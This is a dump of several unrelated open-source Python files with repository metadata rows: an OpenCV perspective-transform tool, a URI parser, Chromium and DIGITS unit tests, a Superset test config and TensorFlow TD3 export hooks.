] | null | null | null | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
] | null | null | null | # Quick and dirty utility to get coordinates for transforming view into
# a bird's eye view. Useful in OCRs were the camera is in a fixed positioning
# viewing a straight plane.
import cv2
import numpy as np
def onTrackbarChange(trackbarValue):
    """No-op callback required by cv2.createTrackbar; trackbar values are
    polled with cv2.getTrackbarPos in the main loop instead."""
    pass
def order_points(pts):
    """Order four (x, y) points as [top-left, top-right, bottom-right, bottom-left].

    Uses the classic heuristic: the top-left corner has the smallest x+y
    sum and the bottom-right the largest; the top-right has the smallest
    y-x difference and the bottom-left the largest.
    """
    ordered = np.zeros((4, 2), dtype="float32")
    coord_sums = pts.sum(axis=1)
    coord_diffs = np.diff(pts, axis=1)
    ordered[0] = pts[np.argmin(coord_sums)]   # top-left: smallest sum
    ordered[2] = pts[np.argmax(coord_sums)]   # bottom-right: largest sum
    ordered[1] = pts[np.argmin(coord_diffs)]  # top-right: smallest y-x
    ordered[3] = pts[np.argmax(coord_diffs)]  # bottom-left: largest y-x
    return ordered
def expandPerspective(rect, width, height):
    """Grow the selected quadrilateral out to the image borders.

    Each edge of ``rect`` (ordered [tl, tr, br, bl]) is extended using
    point-slope form until it meets the image boundary; the four resulting
    corner intersections are returned as a new float32 array in the same
    order.

    NOTE(review): ``rect`` is flipped in place (y negated) as a side
    effect; callers that reuse it afterwards should pass a copy.
    """
    X, Y = 0, 1

    # Work in a y-up coordinate system so slopes behave conventionally.
    rect[:, 1] *= -1
    tl, tr, br, bl = rect

    # Slope of each of the four edges of the quad.
    slope_top = (tr[Y] - tl[Y]) / (tr[X] - tl[X])
    slope_bottom = (br[Y] - bl[Y]) / (br[X] - bl[X])
    slope_left = (tl[Y] - bl[Y]) / (tl[X] - bl[X])
    slope_right = (tr[Y] - br[Y]) / (tr[X] - br[X])

    # Anchor points on the image border (y-up, hence the negation).
    point_right = (width, 0)
    point_top = (0, 0)
    point_bottom = (width, height * -1.0)
    point_left = (0, height * -1.0)

    def _line_intersection(m1, m2, x1, x2, y1, y2, fallback):
        # Intersection of two lines given in point-slope form; fall back
        # to the original corner when the arithmetic degenerates (e.g.
        # parallel edges yield nan/inf that round() cannot convert).
        x = ((m2 * x2 - m1 * x1) - (y2 - y1)) / (m2 - m1)
        y = m1 * (x - x1) + y1
        try:
            return round(x), round(y)
        except Exception:
            return fallback

    new_tr = _line_intersection(slope_top, slope_right, point_top[X], point_right[X], point_top[Y], point_right[Y], tr)
    new_tl = _line_intersection(slope_top, slope_left, point_top[X], point_left[X], point_top[Y], point_left[Y], tl)
    new_br = _line_intersection(slope_bottom, slope_right, point_bottom[X], point_right[X], point_bottom[Y], point_right[Y], br)
    new_bl = _line_intersection(slope_bottom, slope_left, point_bottom[X], point_left[X], point_bottom[Y], point_left[Y], bl)

    # Convert the expanded corners back to image (y-down) coordinates.
    expanded = np.array([new_tl, new_tr, new_br, new_bl], dtype="float32")
    expanded[:, 1] *= -1
    return expanded
# Derived from https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example
def four_point_transform(image, pts):
# Unpack points
rect = pts
(tl, tr, br, bl) = rect
# compute the width of the new image, which will be the
# maximum distance between bottom-right and bottom-left
# x-coordinates or the top-right and top-left x-coordinates
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
# compute the height of the new image, which will be the
# maximum distance between the top-right and bottom-right
# y-coordinates or the top-left and bottom-left y-coordinates
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
# now that we have the dimensions of the new image, construct
# the set of destination points to obtain a "birds eye view",
# (i.e. top-down view) of the image, again specifying points
# in the top-left, top-right, bottom-right, and bottom-left
# order
dst = np.array([
[0, 0], #tl
[maxWidth - 1, 0], #tr
[maxWidth - 1, maxHeight - 1], #br
[0, maxHeight - 1]], #bl
dtype = "float32")
# Move image to positive coordinates
min_x = round(abs(np.min(rect[:,0])))
min_y = round(abs(np.min(rect[:,1])))
T = np.matrix( [[ 1 , 0 , min_x], # Get min x
[ 0 , 1 , min_y ], # Get min y
[ 0 , 0 , 1 ]],
dtype = "float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, T * M , (maxWidth + min_x , maxHeight + min_y), borderMode=cv2.BORDER_TRANSPARENT)
# return the warped image
return warped
# Open Image
# NOTE(review): cv2.imread returns None if the file is missing; there is
# no check here, so a bad path surfaces later as an opaque cv2 error.
img = cv2.imread('img\\example1.jpeg')
# Open windows for control, original image, and result
cv2.namedWindow('Control', cv2.WINDOW_AUTOSIZE)
cv2.namedWindow('Main', cv2.WINDOW_AUTOSIZE)
cv2.namedWindow('Birds Eye', cv2.WINDOW_AUTOSIZE)
# Track bars for coordinates: one (x, y) pair per quad corner, each
# bounded by the image dimensions (shape[1] = width, shape[0] = height).
cv2.createTrackbar( 'X L Bot', 'Control', 0, img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y L Bot', 'Control', img.shape[0], img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X L Top', 'Control', 0, img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y L Top', 'Control', 0, img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X R Top', 'Control', img.shape[1], img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y R Top', 'Control', 0, img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X R Bot', 'Control', img.shape[1], img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y R Bot', 'Control', img.shape[0], img.shape[0], onTrackbarChange )
# Main UI loop: read the four trackbar corners, draw the selection on the
# image, and show the corresponding bird's-eye transform until ESC is hit.
while True:
    # Read the four corner points straight from the trackbars.
    # (Previously this built a Python source string and eval()'d it;
    # constructing the array directly is safer and clearer.)
    pts = np.array(
        [
            (cv2.getTrackbarPos('X L Bot', 'Control'), cv2.getTrackbarPos('Y L Bot', 'Control')),
            (cv2.getTrackbarPos('X L Top', 'Control'), cv2.getTrackbarPos('Y L Top', 'Control')),
            (cv2.getTrackbarPos('X R Top', 'Control'), cv2.getTrackbarPos('Y R Top', 'Control')),
            (cv2.getTrackbarPos('X R Bot', 'Control'), cv2.getTrackbarPos('Y R Bot', 'Control')),
        ],
        dtype="int32",
    )
    # Draw the selected perspective on a copy of the original image.
    imgConnectedPoints = cv2.polylines(img.copy(), [pts], isClosed=True, color=(0, 255, 0), thickness=3)
    cv2.imshow('Main', imgConnectedPoints)
    # Draw the transformed bird's eye view.
    warped = four_point_transform(img, expandPerspective(order_points(pts), img.shape[1], img.shape[0]))
    cv2.imshow('Birds Eye', warped)
    # Exit on ESC (27). Using break (instead of exit(0)) lets the cleanup
    # below actually run.
    if cv2.waitKey(1) == 27:
        break

# Fix: was `cv.detroyAllWindows()` -- undefined module `cv` and a
# misspelled method name; it was also unreachable because the loop
# terminated the process with exit(0).
cv2.destroyAllWindows()
| 37.502924 | 138 | 0.659598 |
ace7391ff13915ec1863667830b936f8b2b24a69 | 653 | py | Python | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
fuocore.furi
~~~~~~~~~~~~
这个模块提供了 furi 相关对象及处理函数。
一个 furi 例子:fuo://local:song:/Music/xxx.mp3
"""
from collections import namedtuple
FUri = namedtuple(
    'FUri',
    ('scheme', 'provider', 'category', 'identifier')
)


def parse_furi(furi):
    """Parse a furi string into an FUri tuple; absent parts are None.

    The body after ``scheme://`` is split on '/': three segments map to
    (provider, category, identifier), two to (provider, category), and
    any other non-empty split keeps only the first segment as provider.
    """
    scheme, body = furi.split('://')
    provider, category, identifier = None, None, None
    if body:
        segments = body.split('/')
        if len(segments) == 3:
            provider, category, identifier = segments
        elif len(segments) == 2:
            provider, category = segments
        else:
            provider = segments[0]
    return FUri(scheme, provider, category, identifier)
| 19.205882 | 55 | 0.574273 |
ace7395b55e27ff042c4ab6f3f7c39e70790e034 | 2,218 | py | Python | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2021-01-05T23:43:46.000Z | 2021-01-07T23:36:34.000Z | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import unittest
from benchmarks import system_health as system_health_benchmark
from core import path_util
from page_sets.system_health import system_health_stories
from page_sets.system_health import system_health_story
from telemetry import benchmark as benchmark_module
from py_utils import discover
def _GetAllSystemHealthBenchmarks():
  """Returns every discovered benchmark class defined in system_health.py."""
  all_perf_benchmarks = discover.DiscoverClasses(
      path_util.GetOfficialBenchmarksDir(), path_util.GetPerfDir(),
      benchmark_module.Benchmark,
      index_by_class_name=True).values()
  # Keep only benchmarks whose defining module is the system_health module.
  return [b for b in all_perf_benchmarks if
          sys.modules[b.__module__] == system_health_benchmark]
class TestSystemHealthBenchmarks(unittest.TestCase):
  """Conventions that every system_health benchmark must follow."""

  def testNamePrefix(self):
    # All benchmark names must be namespaced under "system_health.".
    for b in _GetAllSystemHealthBenchmarks():
      self.assertTrue(
          b.Name().startswith('system_health.'),
          '%r must have name starting with "system_health." prefix' % b)

  def testSystemHealthStorySetIsUsed(self):
    for b in _GetAllSystemHealthBenchmarks():
      # The webview startup benchmark builds its story set differently,
      # so it is exempt from this check.
      if b is system_health_benchmark.WebviewStartupSystemHealthBenchmark:
        continue
      self.assertIsInstance(
          b().CreateStorySet(None),
          system_health_stories.SystemHealthStorySet,
          '%r does not use SystemHealthStorySet' % b)
class TestSystemHealthStories(unittest.TestCase):
  """Conventions that individual system health stories must follow."""

  def testNoOverrideRunPageInteractions(self):
    desktop_stories = (
        system_health_stories.DesktopSystemHealthStorySet().stories)
    mobile_stories = (
        system_health_stories.MobileSystemHealthStorySet().stories)
    for s in desktop_stories + mobile_stories:
      # Long running stories has their own way of collecting memory dumps,
      # so they explicitly override RunPageInteractions method.
      if s.name.startswith('long_running:'):
        continue
      # Fix: assertEquals is a deprecated alias of assertEqual (removed
      # from unittest in Python 3.12).
      self.assertEqual(
          s.__class__.RunPageInteractions,
          system_health_story.SystemHealthStory.RunPageInteractions,
          'Story %s overrides RunPageInteractions. Override _DidLoadDocument '
          'instead' % s.name)
ace73b85b8ff60b2b34a85a524b3e4b4a1df7b62 | 1,936 | py | Python | tests/superset_test_config_sqllab_backend_persist.py | rodrigoguariento/incubator-superset | b2633a51d43faaca74751349b96fc32784d4b377 | [
"Apache-2.0"
] | 7 | 2017-11-01T06:00:12.000Z | 2019-01-05T13:31:48.000Z | tests/superset_test_config_sqllab_backend_persist.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 108 | 2019-06-10T05:48:22.000Z | 2021-07-26T04:20:03.000Z | tests/superset_test_config_sqllab_backend_persist.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 4 | 2020-06-25T10:42:36.000Z | 2020-08-13T05:39:09.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# flake8: noqa
import os
from copy import copy
from superset.config import * # type: ignore
AUTH_USER_REGISTRATION_ROLE = "alpha"
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(DATA_DIR, "unittests.db")
DEBUG = True
SUPERSET_WEBSERVER_PORT = 8081
# Allowing SQLALCHEMY_DATABASE_URI to be defined as an env var for
# continuous integration
if "SUPERSET__SQLALCHEMY_DATABASE_URI" in os.environ:
SQLALCHEMY_DATABASE_URI = os.environ["SUPERSET__SQLALCHEMY_DATABASE_URI"]
SQL_SELECT_AS_CTA = True
SQL_MAX_ROW = 666
FEATURE_FLAGS = {"foo": "bar"}
def GET_FEATURE_FLAGS_FUNC(ff):
    """Return a copy of the feature-flag dict with the 'super' flag injected.

    The input mapping is not mutated; tests use this to verify that
    Superset applies the configured feature-flag hook.
    """
    augmented = copy(ff)
    augmented["super"] = "set"
    return augmented
TESTING = True
SECRET_KEY = "thisismyscretkey"
WTF_CSRF_ENABLED = False
PUBLIC_ROLE_LIKE_GAMMA = True
AUTH_ROLE_PUBLIC = "Public"
EMAIL_NOTIFICATIONS = False
CACHE_CONFIG = {"CACHE_TYPE": "simple"}
class CeleryConfig(object):
    """Celery settings used for async SQL Lab query execution in tests."""
    BROKER_URL = "redis://localhost"
    CELERY_IMPORTS = ("superset.sql_lab",)
    # Rate-limit the sql_lab.add task to 10 invocations per second.
    CELERY_ANNOTATIONS = {"sql_lab.add": {"rate_limit": "10/s"}}
    CONCURRENCY = 1
DEFAULT_FEATURE_FLAGS = {"SQLLAB_BACKEND_PERSISTENCE": True}
| 30.25 | 79 | 0.76188 |
ace73c6a1668286f32c2a2a538d45c7a2569ede5 | 6,334 | py | Python | blusky/transforms/apply_father_wavelet_2d.py | fogoke/blusky | ca0820a15e171a1289f2e8e479d75ff5c610be99 | [
"BSD-3-Clause"
] | 3 | 2020-03-26T15:10:25.000Z | 2020-11-11T22:13:53.000Z | blusky/transforms/apply_father_wavelet_2d.py | fogoke/blusky | ca0820a15e171a1289f2e8e479d75ff5c610be99 | [
"BSD-3-Clause"
] | 42 | 2019-06-24T15:56:12.000Z | 2020-01-15T21:42:21.000Z | blusky/transforms/apply_father_wavelet_2d.py | enthought/sandia-blusky | bbefd799fa3e4215896006f8de51ce057e47e23e | [
"BSD-3-Clause"
] | 4 | 2020-07-22T11:33:54.000Z | 2021-03-02T21:16:23.000Z | import re
import keras.backend as keras_backend
from keras.layers import DepthwiseConv2D
import numpy as np
from traits.api import Float, HasStrictTraits, Instance, Int, Tuple, Property
from blusky.wavelets.i_wavelet_2d import IWavelet2D
class ApplyFatherWavlet2D(HasStrictTraits):
"""
Provides a "convolution" method that will apply a father wavelet to
the endpoints of a cascade. Be sure to first apply layers to remove
any of the padding.
Assuming the input to the cascade is a power of 2 in shape, the result
will be a set of scattering coefficients at all orders of the transform
sampled regularly throughout the image. You can imagine that every
set of coefficients will be computed at the center of a tile, the shape
of which is determined by the "J" parameter. The degree to which these
tiles over lap is controlled by the "overlap_log_2". For interpretation,
consider values of "J" to give a tile of shape (2**(J+2), 2**(J+2)),
over which the texture of the image can be considered stationary.
The tiles can overlap by a factor of "M", however if you use the
default decimation, you must ensure that you have oversampled enough
to properly represent the stride at all scales of the transform.
With default decimation, oversamples=1, overlap_log_2 can be upto
J - 1. For each unit of overlap, you need to pay the cost of an
additional unit of oversampling.
"""
#: (J) This is the "J" scale parameter of the father wavelet used in the
# transform.
J = Int(2)
#: (M) This is defines the overlap of the tiles, so overlap_log_2 = 0
# would be no overlap, overlap_log_2 = 1 would be 50% overlap,
# overlap_log_2 = 2 would be 75% etc.
overlap_log_2 = Int(0)
#: Size of the image input to the Cascade_2d. This needs to be padded to a
# power of "2" to ensure that the coefficients are consistent.
img_size = Tuple
#: The sample rate of the input data
sample_rate = Float
#: Wavelet to use in convolution
wavelet = Instance(IWavelet2D)
#: Equivalent tile size derived from the log scale J
# J = round(log2(min(tile_size))) - 2
_tile_size = Property(Int, depends_on="J")
def _get__tile_size(self):
size = 2 ** (self.J + 2)
if size > self.img_size[0] or size > self.img_size[1]:
mn = min(self.img_size)
msg = "For image {} by {}, max J is {}".format(
self.img_size[0], self.img_size[1], np.log2(mn) - 2
)
raise RuntimeError(msg)
return (2 ** (self.J + 2), 2 ** (self.J + 2))
def _convolve(self, input_layer, trainable=False):
"""
The concept here is to first derive the applied decimation
from the shape of the input layer, then pad the layer and
apply the a convolution with the father wavelet. The padding
and strideof the convolution is designed to return set of coefficients
for a collections of regular (optionally overlapping) tiles.
This will be the case provided the size of the original input to the
transform are a power of 2.
Parameters
----------
input_layer - Keras Layer
A layer to apply the father wavelet to. The applied wavelet
is derived from the shape of the layer and knowlege of the
input image shape.
trainable - Bool (optional)
Toggle setting the convolution to be trainable. Either way it
is initialized with a gabor wavelet.
Returns
-------
conv - Keras Layer
A Keras layer applying the convolution to the input
"""
# create a convenient name
name = re.sub("[_/].*", "", input_layer.name)
name += "phi"
_, nh, nw, _ = input_layer.shape
nh = nh
nw = nw
# amount of decimation to here.
factor_1 = self.img_size[0] // nh
factor_2 = self.img_size[1] // nw
# how much to decimate the wavelet to required bandwidth
wavelet_stride = min(factor_1, factor_2)
# need to guarantee this, ideally crop the wavelet to a
# power of "2"
wav = self.wavelet.kernel(
0.0, shape=(2 ** (self.J + 2) - 1, 2 ** (self.J + 2) - 1)
)
#
wav = wav[::wavelet_stride, ::wavelet_stride]
# needs to be real
if np.iscomplexobj(wav):
wav = wav.real
# define a little helper to intialize the weights.
def init_weights(shape, **kwargs):
dtype = np.float32
weights = np.zeros(shape, dtype=dtype)
for ichan in range(shape[2]):
weights[:, :, ichan, 0] = wav.astype(dtype)
return keras_backend.variable(value=weights, dtype=dtype)
# use the father wavelet scale here instead of the default:
conv_stride = (
max(
2 ** (-self.overlap_log_2) * self._tile_size[0] // factor_1, 1
),
max(
2 ** (-self.overlap_log_2) * self._tile_size[1] // factor_2, 1
),
)
conv_stride = (int(conv_stride[0]), int(conv_stride[0]))
conv = DepthwiseConv2D(
name=name,
kernel_size=wav.shape,
depth_multiplier=1,
data_format="channels_last",
padding="valid",
strides=conv_stride,
trainable=trainable,
depthwise_initializer=init_weights,
)
return conv(input_layer)
def convolve(self, end_points):
"""
Apply father wavelet convolution.
Parameters
----------
end_points - List(Keras Layers)
Typically this would be the multiple end-points of the 2-D Cascade.
Returns
-------
scattering_transform - List(Keras Layers)
The father wavelet applied to each end-point. The stride and
padding of the convolution produces a consistent set of
coefficients at each scale, provided the shape of the original
image is a power of 2. For example, img.shape = (128, 256).
"""
scattering_transform = [self._convolve(i) for i in end_points]
return scattering_transform
| 35.385475 | 79 | 0.615567 |
ace73c70637fbdb9285a80b3b1a03b0fafeb626d | 631 | py | Python | lib/etc/__init__.py | daijianxin/Parser | 0739216129cd39d69997d28cbc4133b360ea3934 | [
"Apache-2.0"
] | 122 | 2017-11-02T22:17:37.000Z | 2022-01-14T09:55:04.000Z | lib/etc/__init__.py | wfxedu/CRFBiaffineParser | 763368fb8890877694caf0281805da5351d57ef0 | [
"Apache-2.0"
] | 6 | 2017-12-10T10:58:41.000Z | 2019-01-29T12:20:31.000Z | lib/etc/__init__.py | wfxedu/CRFBiaffineParser | 763368fb8890877694caf0281805da5351d57ef0 | [
"Apache-2.0"
] | 35 | 2017-11-27T11:35:03.000Z | 2021-09-26T12:25:52.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2016 Timothy Dozat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| 33.210526 | 74 | 0.73851 |
ace73e898c7d473d30fa5b0ec752cb18060ac1b6 | 5,105 | py | Python | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | 2 | 2021-10-31T01:06:00.000Z | 2021-11-08T09:43:25.000Z | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | null | null | null | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hook builders for TD3 distributed training with SavedModels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import gin
from tensor2robot.export_generators import abstract_export_generator
from tensor2robot.export_generators import default_export_generator
from tensor2robot.hooks import checkpoint_hooks
from tensor2robot.hooks import hook_builder
from tensor2robot.models import model_interface
from tensor2robot.proto import t2r_pb2
from tensor2robot.utils import tensorspec_utils
import tensorflow.compat.v1 as tf # tf
from typing import Text, List, Optional
from tensorflow.contrib import tpu as contrib_tpu
@gin.configurable
class TD3Hooks(hook_builder.HookBuilder):
  """Creates hooks for exporting models for serving in TD3 distributed training.

  See:
  "Addressing Function Approximation Error in Actor-Critic Methods"
  by Fujimoto et al.
  https://arxiv.org/abs/1802.09477

  These hooks manage exporting of SavedModels to two different directories:
  `export_dir` contains the latest version of the model, `lagged_export_dir`
  contains a lagged version, delayed by one interval of `save_secs`.

  Attributes:
    export_dir: Directory to output the latest models.
    lagged_export_dir: Directory containing a lagged version of SavedModels
    save_secs: Interval to save models, and copy the latest model from
      `export_dir` to `lagged_export_dir`.
    num_versions: Number of model versions to save in each directory
    use_preprocessed_features: Whether to export SavedModels which do *not*
      include preprocessing. This is useful for offloading the preprocessing
      graph to the client.
    export_generator: The export generator used to generate the
      serving_input_receiver_fn.
  """

  def __init__(
      self,
      export_dir: Text,
      lagged_export_dir: Text,
      batch_sizes_for_export: List[int],
      save_secs: int = 90,
      num_versions: int = 3,
      use_preprocessed_features=False,
      export_generator: Optional[
          abstract_export_generator.AbstractExportGenerator] = None,
  ):
    super(TD3Hooks, self).__init__()
    self._save_secs = save_secs
    self._num_versions = num_versions
    self._export_dir = export_dir
    self._lagged_export_dir = lagged_export_dir
    self._batch_sizes_for_export = batch_sizes_for_export
    # Fall back to the default export generator when none is injected.
    if export_generator is None:
      self._export_generator = default_export_generator.DefaultExportGenerator()
    else:
      self._export_generator = export_generator

  def create_hooks(
      self,
      t2r_model: model_interface.ModelInterface,
      estimator: tf.estimator.Estimator,
  ):
    """Builds the checkpoint-saver hook that exports SavedModels.

    Returns an empty list when no export directory is configured;
    otherwise a single AsyncCheckpointSaverHook whose listener exports
    to both the latest and the lagged directory.
    """
    if not self._export_dir and not self._lagged_export_dir:
      return []
    self._export_generator.set_specification_from_model(t2r_model)
    # Warmup requests let TF Serving pre-trace the graph at load time.
    warmup_requests_file = self._export_generator.create_warmup_requests_numpy(
        batch_sizes=self._batch_sizes_for_export,
        export_dir=estimator.model_dir)
    in_feature_spec = t2r_model.get_feature_specification_for_packing(
        mode=tf.estimator.ModeKeys.PREDICT)
    in_label_spec = t2r_model.get_label_specification_for_packing(
        mode=tf.estimator.ModeKeys.PREDICT)
    # Pack the feature/label specs into a T2RAssets proto shipped with
    # every exported SavedModel.
    t2r_assets = t2r_pb2.T2RAssets()
    t2r_assets.feature_spec.CopyFrom(in_feature_spec.to_proto())
    t2r_assets.label_spec.CopyFrom(in_label_spec.to_proto())

    def _export_fn(export_dir, global_step):
      """The actual closure function creating the exported model and assets."""
      t2r_assets.global_step = global_step
      tmpdir = tempfile.mkdtemp()
      t2r_assets_filename = os.path.join(tmpdir,
                                         tensorspec_utils.T2R_ASSETS_FILENAME)
      tensorspec_utils.write_t2r_assets_to_file(t2r_assets, t2r_assets_filename)
      res = estimator.export_saved_model(
          export_dir_base=export_dir,
          serving_input_receiver_fn=self._export_generator
          .create_serving_input_receiver_numpy_fn(),
          assets_extra={
              'tf_serving_warmup_requests': warmup_requests_file,
              tensorspec_utils.T2R_ASSETS_FILENAME: t2r_assets_filename
          })
      return res

    # The LaggedCheckpointListener performs the dual (latest + lagged)
    # export each time the async saver writes a checkpoint.
    return [
        contrib_tpu.AsyncCheckpointSaverHook(
            save_secs=self._save_secs,
            checkpoint_dir=estimator.model_dir,
            listeners=[
                checkpoint_hooks.LaggedCheckpointListener(
                    export_fn=_export_fn,
                    num_versions=self._num_versions,
                    export_dir=self._export_dir,
                    lagged_export_dir=self._lagged_export_dir)
            ])
    ]
| 37.536765 | 80 | 0.740646 |
ace73ed2ca5f335add944b9f17d85298f18772e1 | 7,731 | py | Python | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 111 | 2017-04-21T06:03:04.000Z | 2021-04-26T06:36:54.000Z | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 6 | 2017-05-15T22:02:49.000Z | 2018-03-16T10:25:26.000Z | digits/tools/test_create_db.py | PhysicsTeacher13/Digits-NVIDIA | 80c08ed2b84d5d4eb4f1721ab30f3db2ce67690a | [
"BSD-3-Clause"
] | 40 | 2017-04-21T07:04:16.000Z | 2019-11-14T14:20:32.000Z | # Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from collections import Counter
import os.path
import shutil
import tempfile
import Queue
import nose.tools
import numpy as np
import PIL.Image
from . import create_db
from digits import test_utils
# Skip every test in this module unless DIGITS is running with framework
# 'none' (these tests exercise the framework-agnostic DB-creation tools).
test_utils.skipIfNotFramework('none')
class BaseTest():
    """
    Provides some helpful files and utilities

    setUpClass creates an empty file/dir, a small color and grayscale PNG,
    and a "good" label file listing each image 3 times per label 0..2
    (18 lines total, tracked in cls.image_count).
    """
    @classmethod
    def setUpClass(cls):
        # mkstemp/mkdtemp return (fd, path) tuples / a path string.
        cls.empty_file = tempfile.mkstemp()
        cls.empty_dir = tempfile.mkdtemp()
        # Create one good textfile
        cls.good_file = tempfile.mkstemp()
        # Create a color image
        cls.color_image_file = tempfile.mkstemp(suffix='.png')
        cls.numpy_image_color = np.ones((8, 10, 3), dtype='uint8')
        cls.pil_image_color = PIL.Image.fromarray(cls.numpy_image_color)
        cls.pil_image_color.save(cls.color_image_file[1])
        # Create a grayscale image
        cls.gray_image_file = tempfile.mkstemp(suffix='.png')
        cls.numpy_image_gray = np.ones((8, 10), dtype='uint8')
        cls.pil_image_gray = PIL.Image.fromarray(cls.numpy_image_gray)
        cls.pil_image_gray.save(cls.gray_image_file[1])
        cls.image_count = 0
        # Python 2 module: xrange and writing str to the raw fd are intended.
        for i in xrange(3):
            for j in xrange(3):
                os.write(cls.good_file[0], '%s %s\n' % (cls.color_image_file[1], i))
                os.write(cls.good_file[0], '%s %s\n' % (cls.gray_image_file[1], i))
                cls.image_count += 2
    @classmethod
    def tearDownClass(cls):
        # Best-effort cleanup of the temp files; a missing file is fine.
        for f in cls.empty_file, cls.good_file, cls.color_image_file, cls.gray_image_file:
            try:
                os.close(f[0])
                os.remove(f[1])
            except OSError:
                pass
        try:
            shutil.rmtree(cls.empty_dir)
        except OSError:
            raise
class TestFillLoadQueue(BaseTest):
    """Tests for create_db._fill_load_queue (nose generator-style tests)."""
    def test_valid_file(self):
        # Yield one sub-test per shuffle mode.
        for shuffle in True, False:
            yield self.check_valid_file, shuffle
    def check_valid_file(self, shuffle):
        queue = Queue.Queue()
        result = create_db._fill_load_queue(self.good_file[1], queue, shuffle)
        assert result == self.image_count, 'lines not added'
        assert queue.qsize() == self.image_count, 'queue not full'
    def test_empty_file(self):
        for shuffle in True, False:
            yield self.check_empty_file, shuffle
    def check_empty_file(self, shuffle):
        # An empty input file must raise, not silently enqueue nothing.
        queue = Queue.Queue()
        nose.tools.assert_raises(
            create_db.BadInputFileError,
            create_db._fill_load_queue,
            self.empty_file[1], queue, shuffle)
class TestParseLine():
    """Tests for create_db._parse_line: '<path> <label>' parsing."""
    def test_good_lines(self):
        for label, line in [
            (0, '/path/image.jpg 0'),
            (1, 'image.jpg 1'),
            (2, 'image.jpg 2\n'),
            (3, 'image.jpg 3'),
            (4, 'spaces in filename.jpg 4'),
        ]:
            yield self.check_good_line, line, label
    def check_good_line(self, line, label):
